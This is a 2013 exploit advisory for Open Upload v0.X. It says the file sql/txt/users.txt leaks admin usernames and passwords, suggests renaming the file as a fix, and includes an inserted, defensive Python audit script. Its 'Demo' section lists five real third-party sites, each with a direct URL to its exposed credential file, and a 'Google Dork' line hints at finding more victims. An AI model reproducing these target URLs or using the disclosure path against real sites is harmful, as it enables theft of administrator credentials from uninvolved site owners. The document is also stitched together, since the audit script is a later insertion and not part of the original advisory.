
Open Upload v0.X Remote Password Disclosure Vulnerability

Author: TUNISIAN CYBER , Published: 21-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Open Upload v0.X Remote Password Disclosure Vulnerability
[+] Date: 21-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/openupload/files/openupload/
[+] Google Dork: USE YOUR MIND
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
+Description:
Open Upload is an open source, extensible PHP application for fast file upload and download, for sharing big
(and small) files, like rapidshare and megaupload.
It offers multiple authentication methods, database backends, and multilanguage support.

+Exploit:
Open Upload suffers from a remote password disclosure vulnerability which allows an attacker to get the admin username
and password.

127.0.0.1/[PATH]/sql/txt/users.txt

+Fix:
Change users.txt's name
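
An added example, not part of the original advisory or of the Open Upload code: a local audit that lists every `sql/txt/*.txt` file under a web root that no `.htaccess` deny rule covers, which also shows that a renamed file is still served. It assumes Apache with `.htaccess` overrides enabled; the function names are hypothetical.

```python
import re
import sys
from pathlib import Path

# Apache directives that block all HTTP access (2.4 and 2.2 syntax).
# Heuristic: any such line in a .htaccess counts, even inside a <Files> block.
DENY_RE = re.compile(r"^\s*(Require\s+all\s+denied|Deny\s+from\s+all)\s*$",
                     re.IGNORECASE | re.MULTILINE)


def is_denied(path: Path, docroot: Path) -> bool:
    """True if a .htaccess between the file's directory and docroot denies access."""
    directory = path.parent.resolve()
    docroot = docroot.resolve()
    while True:
        htaccess = directory / ".htaccess"
        if htaccess.is_file() and DENY_RE.search(htaccess.read_text(errors="replace")):
            return True
        # Stop at the web root (or the filesystem root as a safety net).
        if directory == docroot or directory == directory.parent:
            return False
        directory = directory.parent


def exposed_data_files(docroot: Path) -> list[str]:
    """Docroot-relative paths of sql/txt/*.txt files the web server would hand out."""
    docroot = docroot.resolve()
    hits = []
    # Match by directory, not by file name, so a renamed users.txt is still found.
    for f in sorted(docroot.rglob("sql/txt/*.txt")):
        if f.is_file() and not is_denied(f, docroot):
            hits.append(f.relative_to(docroot).as_posix())
    return hits


if __name__ == "__main__":
    # Usage: python audit.py /path/to/webroot  (path is an assumption of this example)
    for rel in exposed_data_files(Path(sys.argv[1])):
        print("served over HTTP:", rel)
```

An empty result means every matching file sits under a directory with a deny rule; moving the data directory outside the web root achieves the same without relying on `.htaccess`.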

Demo:
http://78.236.57.171/sql/txt/users.txt
http://peres-eckey.de/openupload/sql/txt/users.txt
http://openupload.cantal.chambagri.fr/sql/txt/users.txt
http://www.cupload.org/sites/cupload/sql/txt/users.txt
http://berretin.batz.com/openupload/sql/txt/users.txt
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt, 5obzMtbga
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
